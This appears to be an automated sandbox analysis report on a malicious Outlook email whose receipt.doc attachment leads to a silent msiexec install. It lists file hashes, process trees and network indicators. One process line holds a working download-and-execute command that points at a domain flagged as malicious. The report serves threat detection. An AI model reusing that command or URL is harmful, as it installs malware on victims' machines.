Field | Value |
---|---|
File name | 0aa1_1a14_50967d5b_47b2_4abb_a7bd_580bb16bb73e.eml (76.2 KB).msg |
Full analysis | https://app.any.run/tasks/e527d344-39dd-465b-ae72-8f022369ff71 |
Verdict | Malicious activity |
Analysis date | November 08, 2018, 11:56:34 |
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators | |
MIME | application/vnd.ms-outlook |
File info | CDFV2 Microsoft Outlook Message |
MD5 | 0ED359F2C121278A26621E78DF05D934 |
SHA1 | E14D5D7323C13FCD19B6EB23328EC7DE783AF443 |
SHA256 | EFDB05BE34AEB3E200C1E479239719EB3F3705C0E71BF607938FFAB2F778CB89 |
SSDEEP | 1536:CbKHTtDCzY8S5GxvSt3y83D2hY2Mgmx32p:CbKHTtD+Kt3R4Y2Dmxg |
Extension | File type (score) |
---|---|
.msg | Outlook Message (38.9) |
.oft | Outlook Form Template (22.7) |
.doc | Microsoft Word document (17.5) |
.xls | Microsoft Excel sheet (16.4) |
PID | CMD | Path | Indicators | Parent process | Details |
---|---|---|---|---|---|
3656 | "C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE" /f "C:\Users\admin\AppData\Local\Temp\0aa1_1a14_50967d5b_47b2_4abb_a7bd_580bb16bb73e.eml (76.2 KB).msg" | C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE | | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Outlook; Version: 14.0.6025.1000 |
1316 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\ASOY3S5M\receipt.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | OUTLOOK.EXE | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000 |
3380 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Embedding | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | WINWORD.EXE | User: admin; Company: Microsoft Corporation; Integrity Level: LOW; Description: Microsoft Word; Exit code: 0; Version: 14.0.6024.1000 |
3896 | C:\Windows\System32\msiexec.exe VI=ssa EXE=DLL /q /norestart /i http://officesupportbox.com/WMIsvc | C:\Windows\System32\msiexec.exe | — | taskeng.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows® installer; Version: 5.0.7600.16385 (win7_rtm.090713-1255) |
2992 | C:\Windows\system32\msiexec.exe /V | C:\Windows\system32\msiexec.exe | | services.exe | User: SYSTEM; Company: Microsoft Corporation; Integrity Level: SYSTEM; Description: Windows® installer; Version: 5.0.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
3656 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\CVR316B.tmp.cvr | — | — | — |
3656 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\~DF9A17F04EDE094173.TMP | — | — | — |
3656 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\ASOY3S5M\receipt (2).doc\:Zone.Identifier:$DATA | — | — | — |
1316 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR4EF6.tmp.cvr | — | — | — |
1316 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_CECDADC5-135E-427F-8D33-48494C895510.0\6CCD04E3.doc\:Zone.Identifier:$DATA | — | — | — |
3380 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_CECDADC5-135E-427F-8D33-48494C895510.0\~DF524EAC0935DE4F5F.TMP | — | — | — |
3656 | OUTLOOK.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$rmalEmail.dotm | pgc | 6BBD88CA96C0C665DBA6AA647C1F25D3 | 544BC2EC696B2829985ECE9A38FC622D4166E8EECAABA99946BA1460F2A02130 |
3656 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\ASOY3S5M\receipt (2).doc | document | D5196A49F3C6B7C354CB8C76BBB60ED5 | 2003B152F09BBBF38702B7265A92E1470F8F1BFE5278B0F171B604F276A05958 |
1316 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | D95C70EB56AF78F5151A09E0808265F3 | C5314D7147EF093EF1E52B562BA5AB376880EF134B4D8C68BDF5E9ECDC64652B |
1316 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_CECDADC5-135E-427F-8D33-48494C895510.0\6CCD04E3.doc | document | D5196A49F3C6B7C354CB8C76BBB60ED5 | 2003B152F09BBBF38702B7265A92E1470F8F1BFE5278B0F171B604F276A05958 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2992 | msiexec.exe | GET | — | 185.244.130.88:80 | http://officesupportbox.com/WMIsvc | unknown | — | — | malicious |
3656 | OUTLOOK.EXE | GET | — | 64.4.26.155:80 | http://config.messenger.msn.com/config/msgrconfig.asmx?op=GetOlcConfig | US | — | — | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3656 | OUTLOOK.EXE | 64.4.26.155:80 | config.messenger.msn.com | Microsoft Corporation | US | whitelisted |
2992 | msiexec.exe | 185.244.130.88:80 | officesupportbox.com | — | — | malicious |
Domain | IP | Reputation |
---|---|---|
config.messenger.msn.com | 64.4.26.155 | whitelisted |
officesupportbox.com | 185.244.130.88 | malicious |